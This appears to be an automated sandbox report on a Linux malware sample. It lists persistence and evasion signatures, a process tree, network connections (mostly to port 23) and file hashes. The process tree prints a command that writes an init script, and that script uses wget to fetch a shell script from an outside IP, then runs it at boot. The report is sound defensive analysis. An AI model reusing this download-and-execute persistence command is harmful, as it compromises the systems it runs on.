Malware Analysis Report

2025-05-28 20:31

Sample ID 241125-k7vmlayrhx
Target 20073737305.zip
SHA256 4bafa66638b4631077e617f850abdec293c5cde65cd12d247bca0c5b029e8357
Tags
antivm defense_evasion discovery persistence privilege_escalation
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4bafa66638b4631077e617f850abdec293c5cde65cd12d247bca0c5b029e8357

Threat Level: Known bad

The file 20073737305.zip was found to be: Known bad.

Malicious Activity Summary

antivm defense_evasion discovery persistence privilege_escalation

yara_template

File and Directory Permissions Modification

Modifies Watchdog functionality

Modifies init.d

Checks mountinfo of local process

Creates/modifies environment variables

Modifies rc script

Modifies systemd

Modifies Bash startup script

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-25 09:15

Signatures

yara_template

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-25 09:15

Reported

2024-11-25 09:17

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

148s

Max time network

129s

Command Line

[/tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A
File opened for modification /dev/misc/watchdog /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Checks mountinfo of local process

antivm
Description Indicator Process Target
File opened for reading /proc/1523/mountinfo /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Creates/modifies environment variables

persistence privilege_escalation defense_evasion
Description Indicator Process Target
File opened for modification /etc/profile /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/system /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A
File opened for modification /etc/init.d/sh /bin/sh N/A

Modifies rc script

persistence
Description Indicator Process Target
File opened for modification /etc/rc.local /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Modifies systemd

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/systemd/system/custom.service /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Modifies Bash startup script

persistence
Description Indicator Process Target
File opened for modification /etc/profile /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself N/A /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/707/cmdline /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A
File opened for reading /proc/self/status /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A
File opened for reading /proc/1/cgroup /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A
File opened for reading /proc/1/sched /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/1530/status /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A
File opened for reading /proc/1531/status /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A
File opened for reading /proc/1/cmdline /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 N/A
File opened for reading /proc/sys/kernel/osrelease /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A

Processes

/tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90

[/tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90]

/bin/sh

[sh -c systemctl enable custom.service >/dev/null 2>&1]

/bin/systemctl

[systemctl enable custom.service]

/bin/sh

[sh -c chmod +x /etc/init.d/system >/dev/null 2>&1]

/bin/chmod

[chmod +x /etc/init.d/system]

/bin/sh

[sh -c ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1]

/bin/ln

[ln -s /etc/init.d/system /etc/rcS.d/S99system]

/bin/sh

[sh -c echo "#!/bin/sh # /etc/init.d/sh case \"$1\" in start) echo 'Starting sh' /bin/sh & wget http://193.143.1.70/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) $0 stop $0 start ;; *) echo \"Usage: $0 {start|stop|restart}\" exit 1 ;; esac exit 0" > /etc/init.d/sh]

/bin/sh

[sh -c chmod +x /etc/init.d/sh >/dev/null 2>&1]

/bin/chmod

[chmod +x /etc/init.d/sh]

/bin/sh

[sh -c mkdir -p /etc/rc.d >/dev/null 2>&1]

/bin/mkdir

[mkdir -p /etc/rc.d]

/bin/sh

[sh -c ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1]

/bin/ln

[ln -s /etc/init.d/sh /etc/rc.d/S99sh]

Network

Country Destination Domain Proto
US 154.216.19.139:199 tcp
N/A 224.0.0.251:5353 udp
RU 193.143.1.70:38242 tcp
IN 165.85.130.119:23 tcp
HK 183.87.130.36:23 tcp
US 144.187.70.108:23 tcp
US 64.1.136.160:23 tcp
CA 173.34.87.254:23 tcp
JP 221.246.9.248:23 tcp
US 51.54.237.153:23 tcp
US 26.128.35.162:23 tcp
IN 27.58.97.112:23 tcp
IN 121.247.165.101:23 tcp
JP 27.89.86.179:23 tcp
US 55.89.48.116:23 tcp
US 34.148.124.55:23 tcp
CN 27.46.109.74:23 tcp
AU 114.73.10.186:23 tcp
US 159.54.226.85:23 tcp
US 195.214.5.74:23 tcp
ES 37.10.199.220:23 tcp
US 8.116.19.66:23 tcp
PK 39.43.190.127:23 tcp
AU 49.182.69.60:23 tcp
BR 177.217.83.163:23 tcp
US 6.225.9.89:23 tcp
GU 202.128.93.166:23 tcp
US 162.150.101.3:23 tcp
TW 210.68.65.225:23 tcp
US 4.10.213.21:23 tcp
KR 203.229.54.64:23 tcp
US 206.110.55.56:23 tcp
US 30.230.57.191:23 tcp
MQ 109.62.125.240:23 tcp
DE 94.135.51.105:23 tcp
RU 176.108.177.120:23 tcp
US 167.64.111.206:23 tcp
US 11.10.42.42:23 tcp
GB 109.68.70.184:23 tcp
ES 77.224.205.245:23 tcp
PT 78.130.118.180:23 tcp
US 67.86.215.12:23 tcp
MX 189.242.254.126:23 tcp
NO 81.29.45.78:23 tcp
US 76.207.175.197:23 tcp
DE 37.85.78.90:23 tcp
AR 200.61.177.202:23 tcp
CN 27.159.57.177:23 tcp
CN 183.167.203.99:23 tcp
US 128.202.190.89:23 tcp
CN 106.85.212.86:23 tcp
PL 79.175.255.236:23 tcp
US 72.195.51.20:23 tcp
CN 60.17.2.101:23 tcp
CA 70.70.174.153:23 tcp
US 148.175.228.174:23 tcp
US 169.181.66.5:23 tcp
CN 223.213.231.57:23 tcp
CN 120.217.35.79:23 tcp
BR 189.114.189.74:23 tcp
DE 84.150.145.169:23 tcp
CN 202.189.52.86:23 tcp
IT 131.154.194.44:23 tcp
US 108.148.96.179:23 tcp
ZM 165.56.83.232:23 tcp
AU 101.180.197.247:23 tcp
DE 80.226.119.205:23 tcp
US 173.233.165.119:23 tcp
US 47.147.207.77:23 tcp
BR 181.232.213.40:23 tcp
US 54.70.64.242:23 tcp
US 96.10.115.202:23 tcp
IE 87.198.135.243:23 tcp
FR 109.9.157.47:23 tcp
CN 114.84.210.205:23 tcp
US 30.125.152.170:23 tcp
US 174.24.121.9:23 tcp
US 131.189.38.75:23 tcp
US 199.6.167.95:23 tcp
US 215.106.181.81:23 tcp
BE 164.15.198.156:23 tcp
TW 42.66.205.217:23 tcp
BR 200.19.72.111:23 tcp
JP 60.84.43.199:23 tcp
DE 178.15.107.152:23 tcp
IE 52.19.119.59:23 tcp
NL 192.136.51.51:23 tcp
US 69.141.229.128:23 tcp
KZ 95.58.21.169:23 tcp
US 136.94.154.64:23 tcp
PT 82.155.79.210:23 tcp
US 209.156.130.79:23 tcp
JP 133.7.235.163:23 tcp
US 67.0.11.89:23 tcp
GB 25.130.235.69:23 tcp
CN 42.168.168.21:23 tcp
US 214.164.123.190:23 tcp
NL 185.138.240.52:23 tcp
TH 180.128.209.43:23 tcp
US 205.80.60.11:23 tcp
SI 86.61.40.105:23 tcp
US 108.201.129.213:23 tcp
US 34.49.158.53:23 tcp
AU 123.3.118.6:23 tcp
US 166.237.20.190:23 tcp
MY 42.188.251.158:23 tcp
JP 211.8.14.88:23 tcp
CN 124.16.238.206:23 tcp
US 165.119.224.21:23 tcp
US 98.20.185.251:23 tcp
US 204.110.160.4:23 tcp
PK 182.179.194.178:23 tcp
US 194.133.227.169:23 tcp
BR 179.243.22.188:23 tcp
US 7.198.122.148:23 tcp
US 23.204.48.159:23 tcp
US 129.101.163.26:23 tcp
MU 105.20.173.115:23 tcp
US 6.94.74.191:23 tcp
US 3.48.7.13:23 tcp
CN 114.94.28.207:23 tcp
GB 194.82.230.237:23 tcp
IE 193.120.67.74:23 tcp
US 139.70.1.99:23 tcp
US 44.227.237.235:23 tcp
BR 177.100.201.109:23 tcp
CN 123.65.142.23:23 tcp
US 138.35.169.0:23 tcp
US 172.119.40.87:23 tcp
KR 112.178.112.227:23 tcp
CN 122.81.83.150:23 tcp
DZ 105.104.141.172:23 tcp
US 100.169.44.250:23 tcp
TW 61.231.197.131:23 tcp
US 24.239.94.182:23 tcp
US 67.217.208.133:23 tcp
US 173.242.165.125:23 tcp
US 143.141.216.11:23 tcp
US 35.252.19.10:23 tcp
GB 193.30.27.210:23 tcp
CA 192.95.141.194:23 tcp
GB 193.56.176.133:23 tcp
US 54.202.114.177:23 tcp
AU 103.70.234.174:23 tcp
US 192.69.215.85:23 tcp
US 214.134.20.60:23 tcp
AR 181.119.118.3:23 tcp
US 44.103.124.4:23 tcp
US 184.45.62.92:23 tcp
UG 102.34.152.112:23 tcp
CN 49.95.202.196:23 tcp
US 65.245.217.109:23 tcp
JP 60.149.255.227:23 tcp
AU 124.177.5.112:23 tcp
SA 180.234.114.78:23 tcp
CA 199.243.210.238:23 tcp
DE 151.189.179.26:23 tcp
FR 103.133.84.206:23 tcp
PH 210.213.149.206:23 tcp
CN 27.198.93.85:23 tcp
US 21.226.1.187:23 tcp
CA 72.0.217.166:23 tcp
CN 202.104.113.50:23 tcp
US 164.223.235.16:23 tcp
KR 14.69.184.245:23 tcp
US 52.39.63.186:23 tcp
US 96.227.190.177:23 tcp
IT 81.121.195.155:23 tcp
US 207.92.108.74:23 tcp
IT 93.145.61.243:23 tcp
US 72.210.255.133:23 tcp
US 74.204.18.52:23 tcp
US 16.13.75.140:23 tcp
CN 112.195.236.70:23 tcp
ES 95.63.198.136:23 tcp
CN 112.241.196.138:23 tcp
US 44.102.21.199:23 tcp
US 75.243.240.94:23 tcp
CH 134.21.102.228:23 tcp
RU 94.77.69.125:23 tcp
US 173.170.50.122:23 tcp
FR 86.192.112.215:23 tcp
US 206.245.47.107:23 tcp
US 96.173.19.57:23 tcp
US 129.38.4.191:23 tcp
VN 14.162.124.138:23 tcp
CN 61.163.205.239:23 tcp
CN 171.105.244.199:23 tcp
DE 130.185.125.83:23 tcp
BR 177.34.76.31:23 tcp
US 137.181.205.104:23 tcp
SG 172.188.154.56:23 tcp
US 7.13.32.22:23 tcp
KR 112.191.199.75:23 tcp
US 215.188.49.185:23 tcp
AE 92.98.37.31:23 tcp
IL 45.12.81.197:23 tcp
ZA 164.151.240.190:23 tcp
FR 46.193.57.25:23 tcp
US 174.199.206.176:23 tcp
FR 162.38.159.37:23 tcp
US 208.152.177.93:23 tcp
US 154.63.60.10:23 tcp
US 154.216.19.139:199 tcp
US 154.216.19.139:199 tcp
US 151.101.193.91:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.7:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 84.17.50.9:443 1527653184.rsc.cdn77.org tcp

Files

/etc/systemd/system/custom.service

MD5 19a440fdac7f578f2fb33719698a082c
SHA1 ebadce21c65d05ad62a324deb39c57aecd3edf2c
SHA256 b176d41b748466f8ba35246c78a1c940f65403b363c086ccd5b5de577a87cf69
SHA512 8bdfac90e7235fc35eeec141a1e2145ed4ea5a250b71bdf0cf0e5e5aa59ab6dc004dc08561bd5547c4a4a106138c98950dc2098c905ce785b9b2c0657684d7bb

/etc/inittab

MD5 3d6b6e1b05ad5d0538ccd8804bcd279b
SHA1 0fc061b51c225d5bea072c939de05e8a856558bc
SHA256 cab2df9c1c498df29445837610f14ae08d4af98d3acac69b0581c01fe594e3c5
SHA512 1957857cffbc0d526eb04e40db166d661b9dc59fc31fb5551f31cd58d270f839ffa2098e81c8555b12e9dbd55ba17df662b14c6441a6389eb9a76082fa401c98

/boot/bootcmd

MD5 735cae7d3cbab0f59d95f84790282103
SHA1 1cb77931b3097f18988016c9ceba3280a5ccb2ae
SHA256 dfdd4cf729384e4ed52516ab72bd86be286c80f53d4f5b764fd2dd2a2b2c983b
SHA512 998daa467c4ee63dd41515897728de70cbb9c579ca8b16c26d8e6db5edad53c6dbd6343fb10eda3dbc29b0cb1fa72a9b2653250e9027e6ee02d17726e958bbfe

/etc/init.d/system

MD5 f000251d92c773cc3ee1ca22cf5f0788
SHA1 e2386fe6a5f29b1e9e5ad5b38928c024f97105e6
SHA256 31a77745dd3724a0691a9255738b9c87516868932e3eb992e2afafcd0574a985
SHA512 0dad5adaa7742dd208596fefad53ab21c39fbf2cbe5c9958b92170d555d316f0a0b02ec5236311b869aa18e90592e81439a3a229bf1307b5daf87d87c5f493c2

/etc/init.d/sh

MD5 c5583b6a699f62cb0a004c99842f5c70
SHA1 b232ef89bf9b36643b5956aaacfd295b9ce2a0a7
SHA256 2b03c83558e4af71f3b35408cf668a2ee06931c21adec760952a21a11bc4c59b
SHA512 a9fc1e4c30452a3d100a8ccfbb707d9d323830fbbca90c98d3c126bf943539baaf1fccb04d435a4b627ed7f1bfb1bbd649dab282488d951dde87e097423e154d

/etc/motd

MD5 2bd9b4be30579e633fc0191aa93df486
SHA1 7d63a9bd9662e86666b27c1b50db8e7370c624ff
SHA256 64dc39f3004dc93c9fc4f1467b4807f2d8e3eb0bfa96b15c19cd8e7d6fa77a1d
SHA512 ae6dd7b39191354cf43cf65e517460d7d4c61b8f5c08e33e6ca3c451dc7cab4de89f33934c89396b80f1aade0a4e2571bd5ae8b76ef80b737d4588703d2814d5